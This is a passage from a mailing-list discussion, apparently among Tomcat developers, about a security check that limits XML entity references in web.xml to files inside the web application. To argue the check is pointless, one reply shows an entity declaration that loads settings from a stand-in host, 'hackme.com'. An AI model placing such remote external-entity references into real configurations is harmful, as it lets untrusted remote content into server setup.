> If this reference is in your web.xml file, then my suggestion is already > being done. To test it, try temporarily copying the settings.xml file > into the WEB-INF directory and changing the relative URL appropriately.
Putting the file in WEB-INF works, even if I use ../settings, ie directly in webapps/ROOT. > I'd be -1 on removing the security check in 4.x/5.x. Fixing 3.3.2 sounds > like a good idea. I'll be -1 to fix the 3.3.2 for many reasons : - It will brake all deployment strategy - I'm still not sure it's a security problem since nobody prevent you to change to PUBLIC and goes outside : <!ENTITY % settings SYSTEM "../../../settings.xml"> %settings; to <!ENTITY % settings PUBLIC "hackme" "http://hackme.com/settings.xml";> %settings; That's more than insecure isn't it ? I take a look in specs and didn't see anything preventing you to have entities located outside WEBAPP so I feel it's a regression and not a security feature. Ad minima, in TC 4.x and 5.x, there should be a setting in web.xml, or server.xml to enable this behaviour even if it's prevented by default. -- To unsubscribe, e-mail: <mailto:[EMAIL PROTECTED]> For additional commands, e-mail: <mailto:[EMAIL PROTECTED]>
